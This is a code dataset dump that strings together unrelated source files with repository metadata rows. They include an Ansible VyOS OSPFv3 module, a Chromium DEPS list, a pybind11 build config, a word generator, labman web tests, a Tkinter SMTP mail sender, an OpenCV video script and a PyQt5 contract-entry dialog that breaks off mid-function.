# set protocols ospfv3 area 2 range '2001:db20::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 3 range '2001:db40::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
#
- name: Replace ospfv3 routes attributes configuration.
vyos.vyos.vyos_ospfv3:
config:
redistribute:
- route_type: bgp
parameters:
router_id: 192.0.2.10
areas:
- area_id: '2'
export_list: export1
import_list: import1
range:
- address: 2001:db10::/32
- address: 2001:db30::/32
- address: 2001:db50::/32
- area_id: '4'
range:
- address: 2001:db60::/32
state: replaced
#
#
# -------------------------
# Module Execution Result
# -------------------------
#
# "before": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db20::/32"
# },
# {
# "address": "2001:db30::/32"
# }
# ]
# },
# {
# "area_id": "3",
# "range": [
# {
# "address": "2001:db40::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
#
# "commands": [
# "delete protocols ospfv3 area 2 range 2001:db20::/32",
# "delete protocols ospfv3 area 3",
# "set protocols ospfv3 area 2 range 2001:db50::/32",
# "set protocols ospfv3 area '4'",
# "set protocols ospfv3 area 4 range 2001:db60::/32"
# ]
#
# "after": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db30::/32"
# },
# {
# "address": "2001:db50::/32"
# }
# ]
# },
# {
# "area_id": "4",
# "range": [
# {
# "address": "2001:db60::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
#
# After state:
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 2 range '2001:db50::/32'
# set protocols ospfv3 area 4 range '2001:db60::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
# Using rendered
#
#
- name: Render the commands for provided configuration
vyos.vyos.vyos_ospfv3:
config:
redistribute:
- route_type: bgp
parameters:
router_id: 192.0.2.10
areas:
- area_id: '2'
export_list: export1
import_list: import1
range:
- address: 2001:db10::/32
- address: 2001:db20::/32
- address: 2001:db30::/32
- area_id: '3'
range:
- address: 2001:db40::/32
state: rendered
#
#
# -------------------------
# Module Execution Result
# -------------------------
#
#
# "rendered": [
# [
# "set protocols ospfv3 redistribute bgp",
# "set protocols ospfv3 parameters router-id '192.0.2.10'",
# "set protocols ospfv3 area 2 range 2001:db10::/32",
# "set protocols ospfv3 area 2 range 2001:db20::/32",
# "set protocols ospfv3 area 2 range 2001:db30::/32",
# "set protocols ospfv3 area '2'",
# "set protocols ospfv3 area 2 export-list export1",
# "set protocols ospfv3 area 2 import-list import1",
# "set protocols ospfv3 area '3'",
# "set protocols ospfv3 area 3 range 2001:db40::/32"
# ]
# Using parsed
#
#
- name: Parse the commands to provide structured configuration.
vyos.vyos.vyos_ospfv3:
running_config:
"set protocols ospfv3 area 2 export-list 'export1'
set protocols ospfv3 area 2 import-list 'import1'
set protocols ospfv3 area 2 range '2001:db10::/32'
set protocols ospfv3 area 2 range '2001:db20::/32'
set protocols ospfv3 area 2 range '2001:db30::/32'
set protocols ospfv3 area 3 range '2001:db40::/32'
set protocols ospfv3 parameters router-id '192.0.2.10'
set protocols ospfv3 redistribute 'bgp'"
state: parsed
#
#
# -------------------------
# Module Execution Result
# -------------------------
#
#
# "parsed": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db20::/32"
# },
# {
# "address": "2001:db30::/32"
# }
# ]
# },
# {
# "area_id": "3",
# "range": [
# {
# "address": "2001:db40::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
# Using gathered
#
# Before state:
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db20::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 3 range '2001:db40::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
#
- name: Gather ospfv3 routes config with provided configurations
vyos.vyos.vyos_ospfv3:
config:
state: gathered
#
#
# -------------------------
# Module Execution Result
# -------------------------
#
# "gathered": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db20::/32"
# },
# {
# "address": "2001:db30::/32"
# }
# ]
# },
# {
# "area_id": "3",
# "range": [
# {
# "address": "2001:db40::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
#
# After state:
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db20::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 3 range '2001:db40::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
# Using deleted
#
# Before state
# -------------
#
# vyos@192# run show configuration commands | grep ospfv3
# set protocols ospfv3 area 2 export-list 'export1'
# set protocols ospfv3 area 2 import-list 'import1'
# set protocols ospfv3 area 2 range '2001:db10::/32'
# set protocols ospfv3 area 2 range '2001:db20::/32'
# set protocols ospfv3 area 2 range '2001:db30::/32'
# set protocols ospfv3 area 3 range '2001:db40::/32'
# set protocols ospfv3 parameters router-id '192.0.2.10'
# set protocols ospfv3 redistribute 'bgp'
#
- name: Delete attributes of ospfv3 routes.
vyos.vyos.vyos_ospfv3:
config:
state: deleted
#
#
# ------------------------
# Module Execution Results
# ------------------------
#
# "before": {
# "areas": [
# {
# "area_id": "2",
# "export_list": "export1",
# "import_list": "import1",
# "range": [
# {
# "address": "2001:db10::/32"
# },
# {
# "address": "2001:db20::/32"
# },
# {
# "address": "2001:db30::/32"
# }
# ]
# },
# {
# "area_id": "3",
# "range": [
# {
# "address": "2001:db40::/32"
# }
# ]
# }
# ],
# "parameters": {
# "router_id": "192.0.2.10"
# },
# "redistribute": [
# {
# "route_type": "bgp"
# }
# ]
# }
# "commands": [
# "delete protocols ospfv3"
# ]
#
# "after": {}
# After state
# ------------
# vyos@192# run show configuration commands | grep ospfv3
"""
RETURN = """
before:
  description: The configuration prior to the module invocation.
returned: always
type: dict
sample: >
The configuration returned will always be in the same format
of the parameters above.
after:
  description: The resulting configuration after the module invocation.
returned: when changed
type: dict
sample: >
The configuration returned will always be in the same format
of the parameters above.
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample:
- "set protocols ospf parameters router-id 192.0.1.1"
- "set protocols ospfv3 area 2 range '2001:db10::/32'"
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.vyos.vyos.plugins.module_utils.network.vyos.argspec.ospfv3.ospfv3 import (
Ospfv3Args,
)
from ansible_collections.vyos.vyos.plugins.module_utils.network.vyos.config.ospfv3.ospfv3 import (
Ospfv3,
)
def main():
"""
Main entry point for module execution
    :returns: the result from module invocation
"""
required_if = [
("state", "merged", ("config",)),
("state", "replaced", ("config",)),
("state", "rendered", ("config",)),
("state", "parsed", ("running_config",)),
]
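    # e.g. merged/replaced/rendered require `config`, while parsed requires
    # `running_config`; AnsibleModule enforces these pairings at runtime.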
mutually_exclusive = [("config", "running_config")]
module = AnsibleModule(
argument_spec=Ospfv3Args.argument_spec,
required_if=required_if,
supports_check_mode=True,
mutually_exclusive=mutually_exclusive,
)
result = Ospfv3(module).execute_module()
module.exit_json(**result)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
14955d30fe26123e3716725167c4d68ad49205a2 | e76ea38dbe5774fccaf14e1a0090d9275cdaee08 | /src/cc/DEPS | 4e1cc74d6cc126e06e3aa1337ee58dc83ccb80ad | [
"BSD-3-Clause"
] | permissive | eurogiciel-oss/Tizen_Crosswalk | efc424807a5434df1d5c9e8ed51364974643707d | a68aed6e29bd157c95564e7af2e3a26191813e51 | refs/heads/master | 2021-01-18T19:19:04.527505 | 2014-02-06T13:43:21 | 2014-02-06T13:43:21 | 16,070,101 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 561 | include_rules = [
"+gpu/GLES2",
"+gpu/command_buffer/client/context_support.h",
"+gpu/command_buffer/common/gpu_memory_allocation.h",
"+gpu/command_buffer/common/mailbox.h",
"+media",
"+skia/ext",
"+third_party/skia/include",
"+third_party/khronos/GLES2/gl2.h",
"+third_party/khronos/GLES2/gl2ext.h",
"+ui/events/latency_info.h",
"+ui/gfx",
"+ui/gl",
# DO NOT ADD ANY NEW WEBKIT HEADERS TO THIS LIST.
# TODO(danakj): Drop dependencies on WebKit Platform API from cc.
"+third_party/WebKit/public/platform/WebGraphicsContext3D.h",
]
| [
"[email protected]"
] | ||
7b2a0da5898ff8cc6de859b91194a6f1fd42975e | 03534ce46ccb4d82e7752cac264884090c16ae1f | /PyBind11/config.py | a61a9b2d3e787f538b9046e074857e84ede13092 | [] | no_license | alex-v-dev/dependencies | 0ca2a67b97bb9403fa973d4b0a9f34f98694bcdd | 11307514feccd38eeda66c9f0b83194358ffc956 | refs/heads/master | 2023-07-04T22:49:52.940631 | 2021-06-14T13:34:27 | 2021-06-14T13:34:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | {
"downloads" : [
"https://github.com/pybind/pybind11/archive/v2.6.2.tar.gz"
],
"url" : "https://pybind11.readthedocs.io",
"license" : "LICENSE",
"dependencies" : [ "Python" ],
"environment" : {
"PATH" : "{buildDir}/bin:$PATH",
"LD_LIBRARY_PATH" : "{buildDir}/lib",
},
"commands" : [
"cmake"
" -D CMAKE_INSTALL_PREFIX={buildDir} ."
" -D PYBIND11_TEST=0",
"make install",
],
"manifest" : [
"include/pybind11",
],
}
| [
"[email protected]"
] | |
089de6e71f93ea67d7b8693f6b0221acef7db5d3 | 20cc35cb819d988d35d25ae942d0ecc9fe7bc726 | /Prac_03/word_generator_prac_three.py | 252cd137d3a0b982f809d37432661bd9d8b0abde | [] | no_license | LukeElliman/Practicals | 1272b51e9ef45f27dcb31f7d1238a429e14f3d15 | f9de0adff1616e4b797b96f83fa1869790a0492f | refs/heads/master | 2023-05-05T21:42:45.922665 | 2021-05-23T23:36:08 | 2021-05-23T23:36:08 | 341,446,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,608 | py | """
CP1404/CP5632 - Practical
Random word generator - based on format of words
Another way to get just consonants would be to use string.ascii_lowercase
(all letters) and remove the vowels.
"""
import random
VOWELS = "aeiou"
CONSONANTS = "bcdfghjklmnpqrstvwxyz"
VALID_INPUT = "cv"
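# Sketch of the docstring's alternative: derive the same consonant set from
# string.ascii_lowercase by removing the vowels (kept under a new name here,
# ASCII_CONSONANTS, so the literal above stays the source of truth).
import string
ASCII_CONSONANTS = "".join(c for c in string.ascii_lowercase if c not in VOWELS)
assert ASCII_CONSONANTS == CONSONANTS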
def main():
    # User input
valid_input = False
while not valid_input:
word_format = str(input("Enter c's for consonant and v's for vowels: ")).lower()
valid_input = is_valid_format(word_format)
word = word_generator(word_format)
print(word + "\n")
    # Random format
    number_of_letters = int(input("How many letters do you want? "))
    word_format = "".join(random.choice(VALID_INPUT) for _ in range(number_of_letters))
word = word_generator(word_format)
print(word)
def is_valid_format(user_input):
"""Checks if input is valid"""
valid = False
valid_character_count = 0
for each_character in user_input:
if each_character not in VALID_INPUT:
valid_character_count += 1
if valid_character_count > 0:
print("Your input must only be c's and v's")
valid_character_count = 0
elif len(user_input) <= 0:
print("Your input must have more then 0 characters")
else:
print("Valid input \n")
valid = True
return valid
def word_generator(user_input):
"""Turns the cv input into words"""
word = ""
for kind in user_input:
if kind == "c":
word += random.choice(CONSONANTS)
else:
word += random.choice(VOWELS)
return word
main() | [
"[email protected]"
] | |
497e239e4a4996a03027feed630c538b6b031e56 | 493fcf4b7eb61a00a51864ba2b3544541dee2935 | /labman/gui/test/test_study.py | b82f7d7b999379932f6bcd0d4d743a94ba366e7a | [
"BSD-3-Clause"
] | permissive | antgonza/labman | d56ab55debdbea4024e12b6e84625b5a472fdbe2 | c3bb7a15cbfdbbf60a7b2b176fff207f99af0002 | refs/heads/master | 2021-05-11T16:09:12.890965 | 2019-04-08T23:29:09 | 2019-04-08T23:29:09 | 117,754,098 | 0 | 0 | BSD-3-Clause | 2019-03-31T20:38:09 | 2018-01-16T23:10:41 | Python | UTF-8 | Python | false | false | 3,280 | py | # ----------------------------------------------------------------------------
# Copyright (c) 2017-, labman development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from unittest import main
from tornado.escape import json_decode
from labman.gui.testing import TestHandlerBase
class TestStudyHandlers(TestHandlerBase):
def test_get_study_list_handler(self):
response = self.get('/study_list')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = {'data': [
[1, 'Identification of the Microbiomes for Cannabis Soils',
'Cannabis Soils', '[email protected]', 27]]}
self.assertEqual(obs, exp)
def test_get_study_handler(self):
response = self.get('/study/1/')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = {'study_id': 1,
'study_title': 'Identification of the Microbiomes for '
'Cannabis Soils',
'total_samples': 27}
self.assertEqual(obs, exp)
# Test non-existent study
response = self.get('/study/400/')
self.assertEqual(response.code, 404)
def test_get_study_samples_handler(self):
response = self.get('/study/1/samples')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195',
'1.SKB4.640189', '1.SKB5.640181', '1.SKB6.640176',
'1.SKB7.640196', '1.SKB8.640193', '1.SKB9.640200',
'1.SKD1.640179', '1.SKD2.640178', '1.SKD3.640198',
'1.SKD4.640185', '1.SKD5.640186', '1.SKD6.640190',
'1.SKD7.640191', '1.SKD8.640184', '1.SKD9.640182',
'1.SKM1.640183', '1.SKM2.640199']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=SKB')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195',
'1.SKB4.640189', '1.SKB5.640181', '1.SKB6.640176',
'1.SKB7.640196', '1.SKB8.640193', '1.SKB9.640200']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=SKB1')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=1.64')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKD1.640179', '1.SKM1.640183']
self.assertEqual(obs, exp)
# test non-existent study
response = self.get('/study/400/sample_search')
def test_get_study_summary_handler(self):
response = self.get('/study/1/summary')
self.assertEqual(response.code, 200)
self.assertNotEqual(response.body, '')
response = self.get('/study/1000/summary')
self.assertEqual(response.code, 404)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
1a728171fa0d72923f75ff0a93d3da29aad4725e | 4476597f6af6b9cd4614bf558553a7eb57c9f993 | /io/email-send.py | b0c8e5b3defd2e2685124e52af398dd84e39b324 | [] | no_license | zhengziqiang/mypython | 07dff974f475d1b9941b33518af67ece9703691a | 7a2b419ff59a31dc937666e515490295f6be8a08 | refs/heads/master | 2021-07-14T20:01:34.231842 | 2017-04-19T01:18:25 | 2017-04-19T01:18:25 | 56,583,430 | 3 | 1 | null | 2020-07-23T11:46:35 | 2016-04-19T09:26:39 | Python | UTF-8 | Python | false | false | 3,529 | py | from Tkinter import *
from smtplib import *
import string
import tkMessageBox as mes
class loginPage(object):
def __init__(self,master,info='Mail Send System'):
self.master=master
self.mainlabel=Label(master,text=info,justify=CENTER)
self.mainlabel.grid(row=0,columnspan=3)
self.user=Label(master,text='username',borderwidth=2)
self.user.grid(row=1,sticky=W)
self.pwd=Label(master,text='passwd',borderwidth=2)
self.pwd.grid(row=2,sticky=W)
self.userEntry=Entry(master)
self.userEntry.grid(row=1,column=1,columnspan=2)
self.userEntry.focus_set()
self.pwdEntry=Entry(master,show='*')
self.pwdEntry.grid(row=2,column=1,columnspan=1)
self.loginButton=Button(master,text='login',borderwidth=2,command=self.login)
self.loginButton.grid(row=3,column=1)
self.clearButton=Button(master,text='Clear',borderwidth=2,command=self.clear)
self.clearButton.grid(row=3,column=2)
def login(self):
self.username=self.userEntry.get().strip()
self.passwd=self.pwdEntry.get().strip()
if len(self.username) ==0 or len(self.passwd)==0 or '@' not in self.username:
mes.showwarning('warning','passwd or username is not right')
self.clear()
self.userEntry.focus_set()
return
self.get_smtp()
self.connect()
def connect(self):
'this method will try to connect to the smtp server according to the current user'
		HOST = 'smtp.' + self.smtp + '.com'  # e.g. smtp.gmail.com for user@gmail.com
try:
self.mysmtp=SMTP(HOST)
self.mysmtp.login(self.username,self.passwd)
except Exception, e:
mes.showerror('connecting error','%s'%e)
return
self.mySendMail=sendMail(self.master,self.mysmtp,self.username)
	def clear(self):
self.userEntry.delete(0,END)
self.pwdEntry.delete(0,END)
def get_smtp(self):
'this method try to obtain the smtp host according the user account'
firstSplit=self.username.split('@')[1]
self.smtp=firstSplit.split('.')[0]
class sendMail(object):
def __init__(self,master,smtp='',sender=''):
self.smtp=smtp
self.sender=sender
self.sendPage=Toplevel(master)
self.sendToLabel = Label(self.sendPage,text='send to:')
self.sendToLabel.grid()
self.sendToEntry = Entry(self.sendPage)
self.sendToEntry.grid(row=0,column=1)
self.subjectLabel=Label(self.sendPage,text='subject:')
self.subjectLabel.grid(row=1,column=0)
self.subjectEntry=Entry(self.sendPage)
self.subjectEntry.grid(row=1,column=1)
self.fromTolabel=Label(self.sendPage,text='from to')
self.fromTolabel.grid(row=2,column=0)
self.fromToAdd=Label(self.sendPage,text=self.sender)
self.fromToAdd.grid(row=2,column=1)
self.sendText=Text(self.sendPage)
self.sendText.grid(row=3,column=0,columnspan=2)
		self.newButton=Button(self.sendPage,text='new mail',command=self.newMail)
		self.newButton.grid(row=4,column=1)
		# the original class defined sendMail() but nothing triggered it; add a send button
		self.sendButton=Button(self.sendPage,text='send',command=self.sendMail)
		self.sendButton.grid(row=4,column=0)
def getMailInfo(self):
self.sendToAdd=self.sendToEntry.get().strip()
self.subjectInfo=self.subjectEntry.get().strip()
		self.sendTextInfo=self.sendText.get(1.0,END)
def sendMail(self):
self.getMailInfo()
body=string.join(("From: %s" % self.sender, "To: %s" % self.sendToAdd, "Subject: %s" % self.subjectInfo, "", self.sendTextInfo), "\r\n")
try:
self.smtp.sendmail(self.sender,[self.sendToAdd],body)
		except Exception as e:
			mes.showerror("send failure:","%s"%e)
			return
		mes.showinfo('Prompt','success')
def newMail(self):
self.sendToEntry.delete(0,END)
self.subjectEntry.delete(0,END)
		self.sendText.delete(1.0,END)
if __name__=='__main__':
root=Tk()
root.title('simple mail send system')
mylogin=loginPage(root)
mainloop()
| [
"[email protected]"
] | |
580123fccf31e7c332168aeb8fe195413662dc0f | 8aa50378af42f325083be548baaf78b4dbf619ab | /OpenCVTest/ReadWebMFile/read_n_save_to_video.py | cb193792096e706e0ef3c655661e388c76d2d982 | [] | no_license | jamescfli/PythonTest | 35919a6671b3d85a0f0212ea6da8baefbd5fcbe0 | 87c4092b046fba45e3e98f03944c17edde11b8b1 | refs/heads/master | 2021-01-20T02:44:25.963174 | 2017-07-01T15:58:32 | 2017-07-01T15:58:32 | 62,287,876 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,272 | py | import cv2
# video_filepath = './video_clips/b.mp4' # no problem for .mp4 in general, but this one does not work
# video_filepath = './video_clips/b.webm'
# video_filepath = './video_clips/test.webm'
video_filepath = './video_out/b_640x1280_15fps.mp4'
# video_filepath = './video_out/b_640x1280_60fps.mp4'
# .. Issue: VIDEOIO(cvCreateFileCapture_AVFoundation (filename)): raised unknown C++ exception!
print("loading {}".format(video_filepath))
cap = cv2.VideoCapture(video_filepath)
# cap = cv2.VideoCapture(video_filepath, cv2.CAP_FFMPEG) # after brew install ffmpeg
print("capture finished")
output_shape = (480, 960)
# const char* filename, int fourcc, double fps, CvSize frame_size, int is_color=1 (gray or color)
# forcecc = cv2.VideoWriter_fourcc('D', 'I', 'V', 'X')
# forcecc = cv2.VideoWriter_fourcc('X', 'V', 'I', 'D')
forcecc = cv2.VideoWriter_fourcc(*'MPEG')
out = cv2.VideoWriter('./video_out/output.avi', forcecc, 30.0, output_shape[::-1], isColor=True)
print('finish init video writer')
frame_counter = 0
while cap.isOpened():
ret, frame = cap.read()
if ret:
frame_counter += 1
out.write(frame)
else:
break
print(frame_counter)  # 2473 frames for b.mp4
cap.release()
out.release()
cv2.destroyAllWindows() | [
"[email protected]"
] | |
3bb0200c41571bb5e28f148a52ee99b29915d82b | 8b5b782e06dd00bfc05c789ea3d60b4f10d78784 | /dlgcontractdata.py | 4a6dd4ab74ff3bae6eb8a9f76eff1f121f21c39c | [] | no_license | igrekus/shipment | 471744fbbf35900efb8aee4cce2b0ebe9e13bf3f | b69f9efa213988e5445c90219a4d794fbc53f017 | refs/heads/master | 2021-09-07T14:59:45.181585 | 2018-02-24T13:07:43 | 2018-02-24T13:07:43 | 105,753,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,980 | py | import sys
import const
import datetime
from copy import deepcopy
from comboboxdelegate import ComboBoxDelegate
from contractitem import ContractItem
from dateeditdelegate import DateEditDelegate
from productlistmodel import ProductListModel
from PyQt5 import uic
from PyQt5.QtWidgets import QDialog, QMessageBox, QTableView
from PyQt5.QtCore import Qt, QDate, QModelIndex
from spinboxdelegate import SpinBoxDelegate
class DlgContractData(QDialog):
def __init__(self, parent=None, domainModel=None, uifacade=None, item=None, products=None):
super(DlgContractData, self).__init__(parent)
self.setAttribute(Qt.WA_QuitOnClose)
self.setAttribute(Qt.WA_DeleteOnClose)
# create instance variables
# ui
self.ui = uic.loadUi("DlgContractData.ui", self)
# init instances
self._domainModel = domainModel
self._uiFacade = uifacade
# data members
self._currentItem: ContractItem = item
self.newItem = None
self._productList = list()
if products is not None:
self._productList = deepcopy(products)
self._productModel = ProductListModel(self, self._domainModel)
self.initDialog()
def initDialog(self):
# init widgets
self.ui.tableProduct: QTableView
self.ui.tableProduct.setItemDelegateForColumn(0, ComboBoxDelegate(parent=self.ui.tableProduct,
mapModel=self._domainModel.dicts[
const.DICT_PRODUCT]))
self.ui.tableProduct.setItemDelegateForColumn(1, SpinBoxDelegate(parent=self.ui.tableProduct))
self.ui.tableProduct.setItemDelegateForColumn(3, DateEditDelegate(parent=self.ui.tableProduct))
self.ui.comboClient.setModel(self._domainModel.dicts[const.DICT_CLIENT])
self.ui.tableProduct.setModel(self._productModel)
self._productModel.initModel(self._productList)
# setup signals
self.ui.btnOk.clicked.connect(self.onBtnOkClicked)
self.ui.btnClientAdd.clicked.connect(self.onBtnClientAddClicked)
self.ui.btnProductAdd.clicked.connect(self.onBtnProductAddClicked)
self.ui.btnProductRemove.clicked.connect(self.onBtnProductRemoveClicked)
self.ui.btnNewProduct.clicked.connect(self.onBtnNewProductClicked)
# set widget data
if self._currentItem is None:
self.resetWidgets()
else:
self.updateWidgets()
# adjust UI
self.ui.tableProduct.resizeColumnsToContents()
def updateWidgets(self):
def formatDate(date: datetime.date):
if isinstance(date, datetime.date):
return QDate().fromString(date.isoformat(), "yyyy-MM-dd")
else:
return QDate().fromString("2000-01-01", "yyyy-MM-dd")
self.ui.editIndex.setText(self._currentItem.item_index)
self.ui.comboClient.setCurrentText(self._domainModel.dicts[const.DICT_CLIENT].getData(self._currentItem.item_clientRef))
self.ui.editProject.setText(self._currentItem.item_projCode)
		self.ui.editRequestN.setText(self._currentItem.item_requestN)
		self.ui.dateRequest.setDate(formatDate(self._currentItem.item_requestDate))
		self.ui.editDogozN.setText(self._currentItem.item_dogozName)
		self.ui.dateDogoz.setDate(formatDate(self._currentItem.item_dogozDate))
self.ui.editDevRequestN.setText(self._currentItem.item_deviceRequestN)
self.ui.editDevRequestCode.setText(self._currentItem.item_deviceRequestCode)
self.ui.editContractN.setText(self._currentItem.item_contractN)
self.ui.dateContract.setDate(formatDate(self._currentItem.item_contractDate))
self.ui.dateSpecReturn.setDate(formatDate(self._currentItem.item_specReturnDate))
self.ui.spinSum.setValue(float(self._currentItem.item_sum)/100)
self.ui.editBillN.setText(self._currentItem.item_billNumber)
self.ui.dateBill.setDate(formatDate(self._currentItem.item_billDate))
self.ui.dateMil.setDate(formatDate(self._currentItem.item_milDate))
self.ui.dateAddLetter.setDate(formatDate(self._currentItem.item_addLetterDate))
self.ui.dateResponse.setDate(formatDate(self._currentItem.item_responseDate))
self.ui.editPaymentN.setText(self._currentItem.item_paymentOrderN)
self.ui.datePayment.setDate(formatDate(self._currentItem.item_paymentDate))
self.ui.dateMatPurchase.setDate(formatDate(self._currentItem.item_matPurchaseDate))
self.ui.datePlanShip.setDate(formatDate(self._currentItem.item_planShipmentDate))
self.ui.dateManufPlan.setDate(formatDate(self._currentItem.item_manufPlanDate))
self.ui.spinShipPeriod.setValue(self._currentItem.item_shipmentPeriod)
self.ui.editInvoiceN.setText(self._currentItem.item_invoiceN)
self.ui.dateInvoice.setDate(formatDate(self._currentItem.item_invoiceDate))
self.ui.editPacklistN.setText(self._currentItem.item_packingListN)
self.ui.datePacklist.setDate(formatDate(self._currentItem.item_packingListDate))
self.ui.editShipNote.setText(self._currentItem.item_shipNote)
self.ui.dateShip.setDate(formatDate(self._currentItem.item_shipDate))
self.ui.checkComplete.setChecked(bool(self._currentItem.item_completed))
self.ui.textContact.setPlainText(self._currentItem.item_contacts)
def resetWidgets(self):
currentDate = QDate().currentDate()
self.ui.editIndex.setText("")
self.ui.comboClient.setCurrentIndex(0)
self.ui.editProject.setText("")
self.ui.editRequestN.setText("")
self.ui.dateRequest.setDate(currentDate)
self.ui.editDogozN.setText("")
self.ui.dateDogoz.setDate(currentDate)
self.ui.editDevRequestN.setText("")
self.ui.editDevRequestCode.setText("")
self.ui.editContractN.setText("")
self.ui.dateContract.setDate(currentDate)
self.ui.dateSpecReturn.setDate(currentDate)
self.ui.spinSum.setValue(0)
self.ui.editBillN.setText("")
self.ui.dateBill.setDate(currentDate)
self.ui.dateMil.setDate(currentDate)
self.ui.dateAddLetter.setDate(currentDate)
self.ui.dateResponse.setDate(currentDate)
self.ui.editPaymentN.setText("")
self.ui.datePayment.setDate(currentDate)
self.ui.dateMatPurchase.setDate(currentDate)
self.ui.datePlanShip.setDate(currentDate)
self.ui.dateManufPlan.setDate(currentDate)
self.ui.spinShipPeriod.setValue(180)
self.ui.editInvoiceN.setText("")
self.ui.dateInvoice.setDate(currentDate)
self.ui.editPacklistN.setText("")
self.ui.datePacklist.setDate(currentDate)
self.ui.editShipNote.setText("")
self.ui.dateShip.setDate(currentDate)
self.ui.checkComplete.setChecked(False)
self.ui.textContact.setPlainText("")
def verifyInputData(self):
if not self.ui.editIndex.text():
QMessageBox.information(self, "Ошибка", "Введите индекс поставки.")
return False
if self.ui.comboClient.currentData(const.RoleNodeId) == 0:
QMessageBox.information(self, "Ошибка", "Выберите клиента.")
return False
if not self.ui.editProject.text():
QMessageBox.information(self, "Ошибка", "Введите код работы.")
return False
if not self.ui.editRequestN.text():
QMessageBox.information(self, "Ошибка", "Введите номер запроса.")
return False
if not self.ui.editDogozN.text():
QMessageBox.information(self, "Ошибка", "Введите номер ДОГОЗ.")
return False
if self.ui.spinSum.value() <= 0:
QMessageBox.information(self, "Ошибка", "Введите сумму.")
return False
if self.ui.spinShipPeriod.value() <= 0:
QMessageBox.information(self, "Ошибка", "Введите срок поставки.")
return False
if self._productModel.rowCount() == 0:
QMessageBox.information(self, "Ошибка", "Добавьте товары в список.")
return False
else:
ids = self._productModel.getProductIdList()
if len(ids) > len(set(ids)):
QMessageBox.information(self, "Ошибка", "Товары в списке не должны повторяться.")
return False
# TODO: move to the model
for i in range(self._productModel.rowCount()):
if self._productModel.data(self._productModel.index(i, 0, QModelIndex()), Qt.DisplayRole).value() == "Все":
# TODO: fix crash on message dismissal
QMessageBox.information(self, "Ошибка", "Выберите товар из списка.")
return False
# TODO: reject dupes in product list
return True
def collectData(self):
# def getDate(strdate):
# return str
id_ = None
if self._currentItem is not None:
id_ = self._currentItem.item_id
completed = False
if self._currentItem is not None:
completed = self._currentItem.item_completed
# TODO: change date formats
self.newItem = ContractItem(id_=id_,
index=self.ui.editIndex.text(),
clientRef=self.ui.comboClient.currentData(const.RoleNodeId),
projCode=self.ui.editProject.text(),
requestN=self.ui.editRequestN.text(),
requestDate=datetime.datetime.strptime(
self.ui.dateRequest.date().toString("yyyy-MM-dd"), "%Y-%m-%d").date(),
		                            dogozName=self.ui.editDogozN.text(),  # was dateDogoz.text(), the wrong widget
dogozDate=datetime.datetime.strptime(
